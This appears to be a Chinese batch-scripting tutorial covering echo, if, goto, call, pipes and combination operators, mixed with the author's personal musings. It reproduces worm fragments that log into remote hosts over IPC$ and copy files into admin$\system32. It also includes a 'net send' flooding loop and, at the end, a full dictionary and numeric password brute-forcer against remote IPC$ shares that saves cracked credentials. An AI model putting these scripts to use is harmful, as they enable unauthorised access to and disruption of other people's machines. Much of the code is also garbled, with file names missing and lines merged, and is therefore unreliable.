这个脚本，废话！）一起在当前目录中。使用这个批处理脚本，可以最大可能的减少手工输

入，整个过程中只需要按几下回车键，即可实现从汇编源代码到可执行exe文件的自动化转

换，并具备智能判断功能：如果汇编时源代码出现错误（汇编不成功），则自动暂停显示错

误信息，并在按任意键后自动进入编辑源代码界面；如果源代码汇编成功，则进行连接，并

在连接后自动执行生成的exe文件。另外，由于批处理命令的简单性和灵活性，这个脚本还

具备良好的可改进性，简单进行修改就可以符合不同朋友的上机习惯。正在学汇编的朋友，

一定别忘了实习一下！

在这个脚本中出现了如下几个命令：@、echo、::、pause、:和goto、%以及if。而这一

章就将讲述这几个命令。

1、@这个符号大家都不陌生，email的必备符号，它怎么会跑到批处理中呢？呵呵，不

是它的错，批处理本来就离不开它，要不就不完美了。它的作用是让执行窗口中不显示它后

面这一行的命令本身（多么绕口的一句话！）。呵呵，通俗一点说，行首有了它的话，这一行

的命令就不显示了。在例五中，首行的@echo off中，@的作用就是让脚本在执行时不显示后

面的echo off部分。这下懂了吧？还是不太懂？没关系，看完echo命令简介，自然就懂了。

2、echo中文为“反馈”、“回显”的意思。它其实是一个开关命令，就是说它只有两种状

态：打开和关闭。于是就有了echo on和echo off两个命令了。直接执行echo命令将显示当

前echo命令状态（off或on）执行echo off将关闭回显，它后面的所有命令都不显示命令本

身，只显示执行后的结果，除非执行echo on命令。在例五中，首行的@命令和echo off命令

联合起来，达到了两个目的：不显示echo off命令本身，不显示以后各行中的命令本身。的

确是有点乱，但你要是练习一下的话，3分钟包会，不会的退钱！

echo命令的另一种用法一：可以用它来显示信息！如例五中倒数第二行，Default BAT

file name is 将在脚本执行后的窗口中显示，而echo命令本身不显示（为什

么？？）。

echo命令的另一种用法二：可以直接编辑文本文件。例六：

echo nbtstat -A 192.168.0.1 > o nbtstat -A 192.168.0.2 >> o

nbtstat -A 192.168.0.3 >> 以上脚本内容的编辑方法是，直接是命令行输入，每行

一回车。最后就会在当前目录下生成一个的文件，直接执行就会得到结果。

3、::

这个命令的作用很简单，它是注释命令，在批处理脚本中和rem命令等效。它后面的内

容在执行时不显示，也不起任何作用，因为它只是注释，只是增加了脚本的可读性，和C语

言中的/*„„„„*/类似。地球人都能看懂，就不多说了。

4、pause中文为“暂停”的意思（看看你的workman上），我一直认为它是批处理中最简单

的一个命令，单纯、实用。它的作用，是让当前程序进程暂停一下，并显示一行信息：请按

任意键继续. . .。在例五中这个命令运用了两次，第一次的作用是让使用者看清楚程序信

息，第二个是显示错误的汇编代码信息（其实不是它想显示，而是masm程序在显示错误信息

时被暂它停了，以便让你看清楚你的源代码错在哪里）。

5、:和goto为什么要把这两个命令联合起来介绍？因为它们是分不开的，无论少了哪个

或多了哪个都会出错。goto是个跳转命令，:是一个标签。当程序运行到goto时，将自动跳

转到:定义的部分去执行了（是不是分不开？）。例五中倒数第5行行首出现一个:，则程序在

运行到goto时就自动跳转到:标签定义的部分执行，结果是显示脚本usage（usage就是标签

名称）。不难看出，goto命令就是根据这个冒号和标签名称来寻找它该跳转的地方，它们是

一一对应的关系。goto命令也经常和if命令结合使用。至于这两个命令具体用法，参照例五。

goto命令的另一种用法一：提前结束程序。在程序中间使用goto命令跳转到某一标签，

而这一标签的内容却定义为退出。如：

„„goto end„„:end这里:end在脚本最后一行！其实这个例子很弱智，后面讲了if

命令和组合命令你就知道了。

6、%这个百分号严格来说是算不上命令的，它只是批处理中的参数而已（多个%一起使

用的情况除外，以后还将详细介绍），但千万别以为它只是参数就小看了它（看看例五中有

多少地方用到它？），少了它批处理的功能就减少了51%了。看看例七：

net use %1ipc$ %3 /u:"%2"copy %1admin$system32 /ycopy

%1admin$system32 /ycopy %1admin$system32 /ycopy

%1admin$system32 /yattrib %1admin$ -r -h -s以上代码是

病毒中的一部分，%1代表的IP，2%代表的username，3%代表password。执行

形式为：脚本文件名 参数一 参数二 „„。假设这个脚本被保存为，则执行形式如下：

a IP username password。这里IP、username、password是三个参数，缺一不可（因为程序

不能正确运行，并不是因为少了参数语法就不对）这样在脚本执行过程中，脚本就自动用用

你的三个参数依次（记住，是依次！也是一一对应的关系。）代换1%、2%和3%，这样就达到

了灵活运用的目的（试想，如果在脚本中直接把IP、username和password都定义死，那么脚

本的作用也就被固定了，但如果使用%的话，不同的参数可以达到不同的目的，是不是更灵

活？）。

关于这个参数的使用，在后续章节中还将介绍。一定要非常熟练才行，这需要很多练习

过程，需要下点狠工夫！

这一章就写到这里了。可能有朋友问了：怎么没介绍if命令？呵呵，不是我忘了，而是

它不容易说清楚，下一章再讲了！这一章讲的这点东西，如果你是初学者，恐怕也够消化的

了。记住一句话：DOS是批处理的BODY，任何一个DOS命令都可以被用在批处理脚本中去完成

特定的功能。到这里，你是否已经想到了用自己肚子里的东西去写点带有自动化色彩的东东

呢？很简单，就是一个DOS命令的集合而已，相信自称为天才的你已经会把计算机等级考试

上机试题中的DOS部分用批处理来自动化完成了。

烦！就好象一个半老女人到了更年期，什么事都想唠叨几句，什么事都感到不舒服，看

谁谁不爽。明知山有虎，偏向虎山行，最后留下一身伤痕无功而返时，才发现自己竟然如此

脆弱，如此渺小，如此不堪一击。徘徊在崩溃的边缘，突然回想起了自己最后一次扁人的那

一刻，还真有点怀念（其实我很不喜欢扁人，更不喜欢被人扁）。我需要发泄，我用手指拼

命的敲打着键盘，在一阵接一阵有节奏的声音中，屏幕上出现了上面的这些文字。可难道这

就是发泄的另一种方式吗？中国人还是厉害，早在几千年前孔老夫子就说过“唯女子与小人，

难养也”，真**有先见之明，佩服！虽然是在发泄，不过大家请放心，以我的脾气，既然决

定写这篇教程，就一定会尽力去写好，写完美，绝对不给自己留下遗憾，要不这教程就不是

我写的！

曾经有一篇经典的批处理教程出现在你的屏幕上，你没有保存，直到找不到它的链接你

才后悔莫及，人世间最大的痛苦莫过于此。如果上天能给你一个再看一次的机会，你会对那

篇教程说三个字：我爱你！如果非要给这份爱加上一个期限，你希望是100年。因为100年后，

你恐怕早已经挂了！而现在，你的屏幕上出现了这篇你正在看的批处理教程，虽然不如你曾

经看的那篇经典，但如果勉强还过的去。你会爱它吗？时间会有50年那么长吗？答案是：试

试看吧。

批处理脚本中最重要的几个命令，将在这一章详细介绍，但是很遗憾，有些细节到现在

我都没掌握的很好，甚至还有些生分。如同还不太懂得爱一样。但我一直都在努力，即使一

直都没有收获。所以可能讲的会比较笼统，但我会告诉你方法，剩下的就是时间问题了，需

要自己去磨练。让我们共同努力吧。冰冻三尺非一日之寒，滴水穿石非一日之功。有些事情，

比如学批处理，比如爱一个人，都是不能速成的，甚至还会有付出艰辛而收获为甚微的情况。

再次重申，看这篇教程的时候，一定要静下心来，除非你已经掌握了这篇教程的所有东西----

但那也就不必看了，浪费时间！

7、if接上一章，接着讲if命令。总的来说，if命令是一个表示判断的命令，根据得出

的每一个结果，它都可以对应一个相应的操作。关于它的三种用法，在这里分开讲。

(1)、输入判断。还是用例五里面的那几句吧：

if "%1"=="" goto usageif "%1"=="/?" goto usageif "%1"=="help" goto usage这里

判断输入的参数情况，如果参数为空（无参数），则跳转到usage；如果参数为/?或help时（大

家一般看一个命令的帮助，是不是输入的/?或help呢，这里这么做只是为了让这个脚本看起

来更像一个真正的程序），也跳转到usage。这里还可以用否定形式来表示“不等于”，例如：

if not "%1"=="" goto usage，则表示如果输入参数不为空就跳转到usage（实际中这样做

就没意义了，这里介绍用法，管不了那么多了，呵呵。）是不是很简单？其实翻译成中文体

会一下就understand了。

(2)、存在判断。再看例二里这句：

if exist C:Progra~1TencentAD*.gif del C:Progra~1TencentAD*.gif如果存

在那些gif文件，就删除这些文件。当然还有例四，都是一样的道理。注意，这里的条件判

断是判断存在的，当然也可以判断不存在的，例如下面这句“如果不存在那些gif文件则退出

脚本”：if not exist C:Progra~1TencentAD*.gif exit。只是多一个not来表示否定而

已。

(3)、结果判断。还是拿例五开刀（没想到自己写的脚本，竟然用处这么大，呵呵）：

masm % errorlevel 1 pause & edit %k %先对源代码进行汇编，

如果失败则暂停显示错误信息，并在按任意键后自动进入编辑界面；否则用link程序连接生

成的obj文件。这里只介绍一下和if命令有关的地方，&命令后面会讲到。这种用法是先判断

前一个命令执行后的返回码（也叫错误码，DOS程序在运行完后都有返回码），如果和定义的

错误码符合（这里定义的错误码为1），则执行相应的操作（这里相应的操作为pause &

edit %部分）。

另外，和其他两种用法一样，这种用法也可以表示否定。用否定的形式仍表达上面三句

的意思，代码变为：

masm % not errorlevel 1 link %se & edit %看到本质了吧？

其实只是把结果判断后所执行的命令互换了一下，“if not errorlevel 1”和“if errorlevel

0”的效果是等效的，都表示上一句masm命令执行成功（因为它是错误判断，而且返回码为0，

0就表示否定，就是说这个错误不存在，就是说masm执行成功）。这里是否加not，错误码到

底用0还是1，是值得考虑的两个问题，一旦搭配不成功脚本就肯定出错，所以一定要体会的

很深刻才行。如何体会的深刻？练习！自己写一个脚本，然后把有not和没有not的情况，返

回码为0或1的情况分别写进去执行（怎么，嫌麻烦啊？排列组合算一下才四中情况你就嫌麻

烦了？后面介绍管道命令和组合命令时还有更麻烦的呢！怕了？呵呵。），这样从执行的结果

中就能很清楚的看出这两种情况的区别。

这种用errorlevel结果判断的用法是if命令最难的用法，但也恰恰是最有用的用法，如

果你不会用errorlevel来判断返回码，则要达到相同的效果，必须用else来表示“否则”的操

作，是比较麻烦的。以上代码必须变成：

masm % exist % link %e pause & edit %关于if命令的这

三种用法就say到这里，理解很简单，但应用时就不一定用的那么得心应手，主要是熟练程

度的问题。可能有的朋友有点惊讶，我怎么没给出类似下面三行的用法介绍，是因为下面三

行是if命令帮助里对它自身用法的解释，任何人只要一个“if /?”就能看到，我没有必要在

这里多费口舌；更重要的原因，是我觉得这样介绍的不清楚，看的人不一定看的懂，所以我

采用上面自己对if命令的理解来介绍。一定要注意的是，这三种用法的格式各不相同，而且

也是不能改变的，但实际上可以互换（以为从本质上讲，这三种用法都是建立在判断的基础

上的，哲学教我们学会透过现象看事物本质！）。有兴趣的朋友可以自己研究一下。

IF [NOT] ERRORLEVEL number do commandIF [NOT] string1==string2 do commandIF [NOT]

EXIST filename do command8、call学过汇编或C的朋友，肯定都知道call指令表示什么意

思了，在这里它的意思其实也是一样的。在批处理脚本中，call命令用来从一个批处理脚本

中调用另一个批处理脚本。看例八（默认的三个脚本文件名分别为、和

）：

：

„„CALL 0„„：

„„ECHO %IPA%.%1 >„„CALL ：

for /f "tokens=1,2,3 delims= " %%i in (%1) do call %%i %%j %%k有没

有看出什么不对的地方？没看出来啊？没看出来就对了，其实就没有不对的地方嘛，你怎么

看的出来！从上面两个脚本，你可以得到如下信息：1、脚本调用可以灵活运用，循环运用、

重复运用。2、脚本调用可以使用参数！关于第一点就不多说了，聪明的你一看就应该会，

这里说一下第二点。

在中，后面跟了参数0，在执行时的效果，其实就是把里的参数%1

用0代替。在中，后面跟了参数（一个文件，也可以做参数），

执行时的效果，就是用中的每一行的三个变量（这里不懂没关系，学过for命令后就

懂了），对应代换中的%%i、%%j和%%k。这里参数调用是非常灵活的，使用时需要好

好体会。在初学期间，可以先学习只调用脚本，至于连脚本的参数一起使用的情况，在后面

的学习中自然就会有比较深刻的理解，这是因为当你已经可以灵活运用批处理脚本后，如何

使代码写的更精简更完美更高效就自然包括到了考虑的范围，这时候你就会发现在调用脚本

时直接加入参数，可以使代码效率加倍。By the way，上面的这几个脚本，都是

病毒的一部分，在后面的教程里，大家将有机会见到这个病毒的真面目。

那是不是说，在同一个目录下至少存在两个批处理脚本文件（只有一个你调用谁？）？

呵呵，注意了，这句话错了！！只有一个照样可以调用----调用自身！看例九（默认脚本文

件名）：

net send %1 This is a call example.

call 这两句一结合，效果自然不怎么样，因为只有一台机器来发消息，谁怕谁啊？

我给你来个礼尚往来！可如果有100台机器同时执行，而且每台机器开10和窗口同时向一个

目标机器发消息的话，呵呵。这里call 的作用就是调用自身，执行完前一句net send

命令后再调用自身，达到了循环执行的目的。

给出一个很有意思的脚本，有兴趣的朋友可以实验一下。例十（默认脚本文件名为）：

call 一定要在DOS窗口下执行，否则只会看到一个窗口一闪而过，看不到最后结

果。等执行完后，当脚本被执行了1260次，别忘了想一下到底是为什么！爱情有时候跟这个

脚本一样，一旦陷入死循环，最后的结果都是意想不到的。只是爱情，绝对不会等到被毫无

理由的循环这么多次，也许在第三次时就出现了love is aborted的提示。

9、find这是一个搜索命令，用来在文件中搜索特定字符串，通常也作为条件判断的铺

垫程序（我怎么突然想起了这四个字？）。这个命令单独使用的情况在批处理中是比较少见

的，因为没什么实际意义。还是借例三来说明：

@echo offnetstat -a -n > e | find "7626" && echo "Congratulations!

You have infected GLACIER!"del se & exit先用netstat命令检查是否有冰河默

认的端口7626在活动，并把结果保存到中。然后使用type命令列出中的内容，再

在列出的内容中搜索字符串“7626” ，发现有的话则提示中了冰河，否则退出。看，find命

令其实就这么简单，但有一点必须要注意到：如果不使用type命令列出中的内容，而

是直接使用find命令在中找“7626”（find "7626" && echo "Congratulations!

You have infected GLACIER!"），就必须得给出这个的绝对路径（我试过了，find并

没有默认路径就是当前路径的功能，必须手动指定。也许是我错了，欢迎指正）。因为在find

命令的帮助里有这么一句话：如果没有指定路径，find将搜索键入的或者由另一个命令产生

的文字。这里的“另一个命令”自然就指的type命令了。

至于find命令的其他几个参数如v、n、i等，有兴趣的朋友自己去研究吧，这已经属于

DOS学习的内容了，这里就不做介绍。关于find命令和其他命令的一些更精妙的用法（有些

简直令人叫绝），后续的教程中将介绍，希望关注。

10、for、set、shift为什么把这三个命令放到一起来讲？原因除了我说明外，恐怕谁

也想不到！很简单的一句话：其实我也不太懂！是的，对于这两个命令，我是从研究

病毒开始学习的，时间过去了不少，但还是没完全搞明白，我怕讲出来连自

己都看不懂，我更怕不小心讲错了成了罪人。所以我给出一个脚本去告诉你，如何让这两个

命令给自己留一个初步的印象，其实也就是这两个命令的入门，而并不是说如何领会这两个

命令。因为要领会如此精妙的两个命令（特别是for）谈何容易！也许你会表扬我说我诚实、

不懂就不懂；也许你会骂我，让我既然不懂就赶紧滚蛋，不要在这里丢人显眼；也许你还会

说一些别的这样那样好听或不好听的话，都随便你了，即使我不同意你说的话，我也会誓死

捍卫你说话的权利。看例十一：

@echo offfor /? > /? > ft /? >t执行后在当前

路径下就生成、和三个文件，里面分别记录了for命令、set命令

和shift命令的帮助信息。地球人都能看懂，我就不多说了。我在网上曾经找了很长时间这

三个命令的教程，但都不理想，基本都是照搬的帮助信息。我想在自己完全掌握了这两个命

令后，一定要写一篇用自己的文字总结出来的for、set和shift教程（关于shift命令，后面

介绍批处理的参数时还将涉及到），一定会的，这是我的心愿之一！需要注意的一点是，这

三个命令的帮助里 ，介绍的都比较死板，虽然也举了一些例子，但这是远远不够的。要掌

握这两个命令，最需要的就是耐心！没写错，就是耐心。光是认真看完它们的帮助文字就已

经需要足够的耐心了，要进一步练习领会这两个命令，难道不需要更大的耐心？实战练习的

机会我会留给你的，关键还是那句话，看你有没有耐心去研究了。看看例十二：

：

CALL IPA=192.168CALL 0:NEARAGAINnetstat -n|find

":" > /F "tokens=7,8,9,10,12 delims=.: " %%I IN () DO SET NUM1=%%I&&

SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL :STARTCALL

"%NUM1%"=="255" GOTO NEARAGAINIF "%NUM1%"=="192" GOTO NEARAGAINIF

"%NUM1%"=="127" GOTO NEARAGAINIF "%NUM2%"=="255" GOTO NEARAGAINIF "%NUM3%"=="255"

GOTO NEARAGAINIF "%NUM4%"=="255" GOTO NEARAGAINSET IPA=%NUM1%.%NUM2%ECHO START >

G %IPA%.%NUM3%.1>G %IPA%.%NUM3%.%NUM4%>>D /C /I "from"

ERRORLEVEL 1 GOTO STARTCALL %NUM3%DEL O START这是

病毒的起始脚本，设置了病毒运行的环境变量。是不是看的头都大了？又忘

了写在第一章第一段的那句话（静下心来！），你应该能体会到学习这两个命令所需要的耐心

了吧。就如同去爱一个人，你得学会宽容，打不得骂不得，用你宽大的胸怀去包容她的一切，

即使你发现爱她的过程如看上面代码的过程一样让你头大，但你还是得爱下去----爱需要理

由吗？不需要吗？需要吗？不需要吗„„等到风平浪静后，最直观的收获就是，你的耐心变

的前所未有的充足，面对她的复杂和善变，你自己会处变不惊，以自己的方式去从容应付曾

经应付不了的场面，即使到最后一身伤痕，也会感慨曾经的举动有多么伟大。

没错，这就是批处理的魅力，这就是爱的魅力。让你受了伤还感谢伤你的人。这种感觉

就好象在自己最喜欢的音乐声中被人强奸，痛并快乐着。

不得不再次重申一遍，各种DOS命令是批处理的BODY（我实在找不出一个更合适的词来

形容他们之间的关系），学好DOS命令是学好批处理的前提。其他DOS命令如copy、dir、del、

type、path、break、start等内部命令，以及ping、net、cmd、at、sort、attrib、fc、find

等外部命令，在批处理里的应用非常广泛。这篇教程的作用，是教你认识批处理，以及如何

利用DOS命令组合出来一个完美的批处理脚本，去让它自动完成你想要它做的事情。而灵活

自如的编辑一个批处理脚本是建立在熟练掌握DOS命令的基础上的，这已经超出了本文的范

畴，在此就不赘述了。

不知不觉中第三章已经结束了。耳麦里传来的依然是陈晓东的《比我幸福》，每隔4分32

秒就自动重播。虽然我不并不很喜欢陈晓东，可这并不妨碍我喜欢音乐，喜欢这首描写的如

此让人感慨的歌。请你一定要比我幸福/才不枉费我狼狈退出/再痛也不说苦/爱不用抱歉来

弥补/至少我能成全你的追逐/请记得你要比我幸福/才值得我对自己残酷/我默默的倒数/最

后再把你看清楚/看你眼里的我好馍糊/慢慢被放逐。我如同一个因年老失色而拉不到客的老

妓女，绝望的徘徊在曾经辉煌的红灯区，用一脸的木然瞟一眼来来去去的人群，默默的回忆

自己并不光彩的过去，幻想自己将要面对的未来。直到看见那些幸福依偎在一起的情侣们，

才突然间发现上帝的公平，和这种公平的残忍。

可以说，批处理脚本中最重要的几个命令我都没有给出如echo或if那样比较详细的介绍，

原因我已经说了，因为我也是个菜，我也不太懂----但我正在学！你呢？今天又去了一趟图

书馆，淘金一样发现了一本叫《DOS批文件》的东东，藏在一个角落里落满了灰，五本摞一

起就跟砖头一样厚了。大概翻了一下，里面介绍了很多比较底层和基础的东西，虽然从思路

上讲，已经有点time out了，很多东西已经基本没有利用的价值（这就是信息时代的更新速

度），但还是很值得看的。于是打算下午淘过来，放假回去了再好好研究一番，连同那几个

不熟悉的命令一起搞熟了，再续写这篇教程。我始终坚信，没有最好只有更好。

但是很可惜，等到下午再去的时候，图书馆楼梯口已经立了一个牌子，上面写着out of

service----人家这学期的工作结束了。于是回到宿舍打算继续写第四章，正在这时又得到

一个“振奋人心”的消息：期末考试有一科挂了，而且是全班第一----这一门整个班里就挂了

我一个。郁闷的情绪刹那间涌上心头，整个世界仿佛都变成黑的了。食堂和小卖部已经陆续

关门，学校里的人越来越少，迎面过来的几个同学也都一身行李，忙碌着准备回家过年，内

心的孤寂和失落如同夏日里暴雨前的乌云，迅速而不可抗拒的占领了心里每一个角落。迎着

一月的冷风我一个人在天桥上发呆，还能怎么样，连期末考试都应付不了的失败男人。

“课间休息”时间好象长了点，呵呵，上课了！从这一章开始，将详细介绍批处理中常用

的几个组合命令和管道命令。这些命令虽然不是必须的，如同爱一个人时不一定非得每天去

陪，但如果少了这个过程，事情就会变的复杂而不完美，所以我认为管道命令和组合命令是

批处理的调味剂，几乎是少不了的。

下面从管道命令讲起。常用的管道命令有以下这些：|、>、>>

11、|这个命令恐怕大家不是很陌生，经常操作DOS的朋友都应该知道，当我们查看一个

命令的帮助时，如果帮助信息比较长，一屏幕显示不完时DOS并不给我们时间让我们看完一

屏幕再翻到另一屏幕，而是直接显示到帮助信息的最后。如在提示符下输入help回车时，就

会看到当前DOS版本所支持的所有非隐含命令，但你只能看到最后的那些命令，前面的早就

一闪而过了，如何解决这个问题？看例十三：

help | more回车后会发现显示满一屏幕后就自动暂停，等候继续显示其他信息。当按

写回车时，变成一个一个的出现；按下空格键时一屏幕一屏幕显示，直到全部显示完为止；

按其他键自动停止返回DOS。

为什么会出现上述现象？答案很简单，这里结合了管道命令|和DOS命令more来共同达到

目的的。这里先简单介绍一下help命令和more命令，对理解|命令的用法有很大帮助。

11.1、help命令。其实这个命令是不需要多说的，但在上述例子中help命令的用法比较

特殊，直接在DOS提示符下输入help命令，结果是让DOS显示其所支持的所有非隐含命令，而

在其他地方用help命令，如输入net help回车，则是显示net命令的帮助信息。

11.2、more命令。可能很多朋友以前就没有接触过这个命令，这个命令在Linux下的用

处非常广泛，也是管道命令之一。大家可以找一篇比较长的文章（）在DOS提示符下输

入如下两个命令去比较一下差别：more 和type 。利用more命令，可以达到逐屏

或逐行显示输出的效果，而type命令只能一次把输出显示完，最后的结果就是只能看到末尾

的部分。在例十三里，more命令的作用就是让输出的信息逐屏或逐行显示。

看到这里，你是否已经能隐约感受到了|命令的作用了？没错，它的作用，就是把前一

命令的输出当后一命令的输入来用的。在例十三里，前一命令的输出，就是help命令执行后

显示的DOS所支持的所有非隐含命令，而这个结果刚好做了后一命令more的输入。所以例十

三和下面的例十四是等效的：

help > e 这里利用另一管道命令>生成了一个文件作为

中间环节，在用more命令查看文件后再删除文件（例十三的所有操作是在内存中

进行的，不生成文件）。可以看出，正确使用管道命令|可以带来事半功倍的效果。

结合例十三和例十四，以及前面的例九再体会一遍：|命令的作用，就是让前一命令的

输出当做后一命令的输入。

12、>、>>

这两个命令的效果从本质上来说都是一样的，他们都是输出重定向命令，说的通俗一点，

就是把前面命令的输出写入到一个文件中。这两个命令的唯一区别是，>会清除掉原有文件

中的内容后把新的内容写入原文件，而>>只会另起一行追加新的内容到原文件中，而不会改

动其中的原有内容。例十五：

echo @echo off > o echo This is a pipeline command example. >> o

echo It is very easy? >> o echo Believe your self! >> o pause >>

o exit >> 依次在DOS提示符下输入以上各行命令，一行一个回车，将在当前

目录下生成一个文件，里面的内容如下：

@echo offecho This is a pipeline command example.

echo It is very easy?

echo Believe your self!

pauseexit看到这里，你得到了多少信息？1、可以直接在DOS提示符下利用echo命令的

写入功能编辑一个文本，而不需要专门的文本编辑工具；2、管道命令>和>>的区别如上所述。

如果这里只用>命令来完成上面操作，最后也会生成一个，但里面的内容就只剩下最后

一行exit了。所以>和>>一般都联合起来用，除非你重定向的输出只有一行，那么就可以只

用>了。结合例一再仔细体会输出重定向管道命令>和>>的用法。

13、<、>&、<&这三个命令也是管道命令，但它们一般不常用，你只需要知道一下就ok

了，当然如果想仔细研究的话，可以自己查一下资料。

<，输入重定向命令，从文件中读入命令输入，而不是从键盘中读入。

>&，将一个句柄的输出写入到另一个句柄的输入中。

<&，刚好和>&相反，从一个句柄读取输入并将其写入到另一个句柄输出中。

关于这三个管道命令的举例，在后面批处理脚本的精妙应用中还将涉及到。

下面介绍组合命令：&、&&、||组合命令，顾名思义，就是可以把多个命令组合起来当

一个命令来执行。这在批处理脚本里是允许的，而且用的非常广泛。它的格式很简单----

既然现在已经成了一个文件了，那么这多个命令就要用这些组合命令连接起来放在同一行

----因为批处理认行不认命令数目。组合命令的作用，就如同给爱人陪不是，说一句是说，

说十句也是说，不一次把好话都说了出来，效果可能会好些----当然得排除一种特殊情况：

这些话是否有先后顺序，有些话是否可以同时说。在批处理脚本里也一样，有些时候某些命

令是不能同时执行的，后面给你说。

刚刚又送走了一个同学，人去楼空的感觉越来越明显，望着空荡荡的床铺，平日里喧闹

的宿舍就只剩下我一个人了，整个世界只有那个平时令人非常讨厌的老鼠这时候才显得可爱

起来----只有它会陪着我在这不敢开灯的漆黑夜里----一个连期末考试都应付不了的失败

男人。失败！我感到快要呼吸不过来，这种失败的压力简直令我窒息，简直让我的手接收不

到大脑的信号，简直让这篇未完成的教程夭折。但我能怪谁？

忙碌了一学期要过年了却挂了科，失败；挂了科也倒罢了，竟然一个人拖全班的后退，

失败中的失败；更失败的，是在这最失落的时候，竟然找不到一个人可以倾诉；然而最失败

的，是突然发现自己竟然如此脆弱，如此耐不住寂寞。不过这倒也解开了心中疑惑很久的一

个问题：为什么明知道那段情是一个旋涡却还心甘情愿的往里面跳----这就是青春，风一样

的年龄，火一样不安的心。不再爱了，我不要再一个人的时候苦苦等待；不再爱了，我不要

在你给的囚笼里怜悯的爱；不再爱了，我不要在别人的视线里如此可笑；不再爱，我不再爱。

就算塌下来，我也要一个人扛着，头不能低腰不能弯，不能喘息不能倾诉，因为虽然失败，

但还是男人，是男人就不能向困难低头！

14、&这可以说是最简单的一个组合命令了，它的作用是用来连接n个DOS命令，并把这

些命令按顺序执行，而不管是否有命令执行失败。例十六：

copy /y & del 其实这句和move 的效果是一样的，只

不过前者是分了两步来进行的（在后面还将涉及到具体使用哪种方法的问题）。这个命令很

简单，就不多费口舌了，唯一需要注意的一点是，这里&两边的命令是有执行顺序的，从前

往后执行。

15、&&切记，这里介绍的几个命令都是组合命令，所以他们前后都必须都有其他命令（要

不如何组合？）。这个命令也不例外，它可以把它前后两个命令组合起来当一个命令来用，

与&命令不同之处在于，它在从前往后依次执行被它连接的几个命令时会自动判断是否有某

个命令执行出错，一旦发现出错后将不继续执行后面剩下的命令。这就为我们自动化完成一

些任务提供了方便。例十七：

dir 文件://1%/www/ && copy 文件://1%/www/ e:backupwww如果

远程主机存在，则copy到本地e:backupwww，如果不存在当然就不执行copy了。

这句对搞网管的朋友是否有点用呢？呵呵。其实它和下面这句的作用是一样的：

if exist 文件://1%/www/ copy 文件://1%/www/ e:backupwww至

于你喜欢用哪个就随便了，我没办法判断dir和if两个命令哪一个执行效率更高，所以不知

道用哪个更好，呵呵。

你是否还记得“有些命令是不能同时执行的”？你是否相信这句话？当然得相信，不信就

给你出道题：把C盘和D盘的文件和文件夹列出到文件中。你将如何来搞定这道题？有

朋友说，这还不是很easy的问题吗？同时执行两个dir，然后把得到的结果>到里就ok

了嘛，看例十八：

dir c: && dir d: > 仔细研究一下这句执行后的结果，看看是否能达到题目的

要求！错了！这样执行后里只有D盘的信息！为什么？就因为这里&&命令和>命令不能

同时出现一个句子里（批处理把一行看成一个句子）！！组合命令&&的优先级没有管道命令>

的优先级高（自己总结的，不妥的地方请指正）！所以这句在执行时将本分成这两部分：dir

c:和dir d: > ，而并不是如你想的这两部分：dir c: && dir d:和> 。要

使用组合命令&&达到题目的要求，必须得这么写：

dir c: > && dir d: >> 这样，依据优先级高低，DOS将把这句话分成以

下两部分：dir c: > 和dir d: >> 。例十八中的几句的差别比较特殊，值得

好好研究体会一下。

当然这里还可以利用&命令（自己想一下道理哦）：

dir c: > & dir d: >> 16、||这个命令的用法和&&几乎一样，但作用刚

好和它相反：利用这种方法在执行多条命令时，当遇到一个执行正确的命令就退出此命令组

合，不再继续执行下面的命令。题目：查看当前目录下是否有以s开头的exe文件，如果有则

退出。例十九：

@echo offdir s*.exe || exit其实这个例子是有破绽的，你看出来了吗？其实很简单，

自己试试就知道了嘛：如果存在那个exe文件，就退出；如果不存在那个exe文件，也退出！

为什么？因为如果不存在那个.exe文件，则前一条命令dir s*.exe执行肯定是不成功的，所

以就继续执行exit，自然就退出了，呵呵。那么如何解决题目给出的问题呢？看例二十：

@echo offdir s*.exe || echo Didn't exist file s*.exe & pause & exit这样执行

的结果，就能达到题目的要求，是否存在s*.exe将出现两种结果。这里加暂停的意思，当然

是让你能看到echo输出的内容，否则一闪而过的窗口，echo就白写了。

给出两个更好研究优先级（同时也是更难理解）的脚本，仔细研究它们的区别，以便彻

底理解各种命令的优先级顺序，对以后自己利用这些命令写脚本有很大的好处----不会出错！

OK，请看例二十一和例二十二：

例二十一：

@echo offdir /a & dir || exit例二十二：

@echo offdir /a && dir || exit警告：患有心脑血管病的朋友请不要研

究以上两例，否则轻者头大如斗，重者血管爆裂。任何人由于研究这两个脚本的区别而造成

的任何事故由自己或其合法监护人负责，与本人和本论坛无关。特此警告！

有关管道命令和组合命令就大概介绍到这里了，不知道聪明的你是否理解？呵呵，能理

解就成天才了，除非你以前就已经掌握！千万别小看了这几个鬼命令，大棒槌是我的说，简

直就不是人学的东西！但我还是静下心来研究了一番，最后得出的结论如上所述，已经一点

不剩的交给你了，希望你好好收藏并消化吸收，当然有错误被你发现了，或者不完整的地方

被你看出来了，请赶紧告诉我一声！

这几个命令真的把我的头都搞大了。在网上有一篇流传很广的批处理教程：“简明批处

理教程”，虽然说的比较全面，但看起来很不过瘾。在对for等命令介绍时就一个for /? >

& start 完事了（当然这一点上我不能说人家什么，毕竟我连for /?都没给出），

而对上述管道命令和组合命令、以及这篇教程以后将讲到的用批处理操作注册表等方面根本

没有介绍。我之所以花整整一章来讲管道命令和组合命令，是因为他们才是批处理的精华和

灵魂，能否正确利用好这几个命令，是能否掌握批处理的前提条件。如for、set等DOS命令

的问题，可以从DOS的角度出发专门有针对性的学习，但有关这几个命令的问题，却是不容

易精通掌握的----他们之间的关系太复杂了！

将下列代码存为bat文件1、如果用字典破解： 字典文件路径及名称 主机 用

户名2、如果用数字破解： 起始数 步长 结束数 主机 用户名密码破解出来之后，

存放于c:文件里面。

将下列代码存为文件@echo offecho

------------------------------------------------------------------- >>c:pass.t

xtecho

------------------------------------------------------------------- >>c:pass.t

xtdate /t >>c:e /t >>c:o 破解结果： >>c:

"%6"=="1" goto 大棒槌是我的说2:大棒槌是我的说1start "正在破解" /min cmd /c for

/f %%i in (%1) do call %2 "%%i" %3goto quit:大棒槌是我的说2start "正在

破解" /min cmd /c for /l %%i in (%1,%2,%3) do call %4 "%%i" %5:quit将下

列代码存为 use %1ipc$ %2 /user:"%3"goto

answer%ERRORLEVEL%rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，

失败返回2:answer0echo 远程主机："%1" >>c:o 用 户：

"%3" >>c:o 密 码：%2 >>c: use

%1ipc$ /deletexit:answer2For对一组文件中的每个文件运行指定的命令。

可以在批处理程序中或直接从命令提示符使用 for 命令。

